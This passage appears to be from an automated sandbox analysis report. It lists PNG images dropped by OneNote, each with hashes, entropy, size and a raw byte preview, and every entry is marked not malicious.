                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
